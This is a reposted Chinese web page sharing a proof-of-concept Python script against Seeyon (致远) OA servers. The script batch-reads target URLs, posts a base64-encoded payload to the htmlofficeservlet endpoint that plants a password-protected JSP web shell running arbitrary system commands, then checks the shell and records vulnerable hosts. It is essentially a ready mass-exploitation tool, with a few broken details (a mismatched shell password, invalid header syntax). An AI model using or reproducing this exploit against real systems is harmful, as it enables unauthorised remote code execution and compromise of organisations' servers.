致远OA利用POC

Posted 5haoanqu

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了致远OA利用POC相关的知识,希望对你有一定的参考价值。

批量检测url

在脚本同目录下建立url.txt

放入待检测的URL

运行脚本

# Wednesday, 26 June 2019
# Author:nianhua
# Blog:https://github.com/nian-hua/

import re
import requests
import base64
from multiprocessing import Pool, Manager

def send_payload(url):

    headers = 'Content-Type': 'application/x-www-form-urlencoded'

    payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="

    payload = base64.b64decode(payload)

    try:

        r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)

        r = requests.get(
            url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')

        if "wangming" in r.text:

            return url

        else:

            return 0

    except:

        return 0

def remove_control_chars(s):
    control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))
    
    control_char_re = re.compile('[%s]' % re.escape(control_chars))

    s = control_char_re.sub('', s)

    if 'http' not in s:

        s = 'http://' + s

    return s

def savePeopleInformation(url, queue):

    newurl = send_payload(url)

    if newurl != 0:

        fw = open('loophole.txt', 'a')
        fw.write(newurl + '\n')
        fw.close()

    queue.put(url)

def main():

    pool = Pool(10)

    queue = Manager().Queue()

    fr = open('url.txt', 'r')

    lines = fr.readlines()

    for i in lines:

        url = remove_control_chars(i)

        pool.apply_async(savePeopleInformation, args=(url, queue,))

    allnum = len(lines)

    num = 0

    while True:

        print queue.get()

        num += 1

        if num >= allnum:

            fr.close()

            break

if "__main__" == __name__:

    main()

以上是关于致远OA利用POC的主要内容,如果未能解决你的问题,请参考以下文章

致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现

通达OA前台任意用户登录漏洞

漏洞复现-致远OA

用友致远A8 OA协同办公管理软件下载地址?

致远OA ajax.do登录绕过任意文件上传

致远(用友)OA或M1 漏洞复现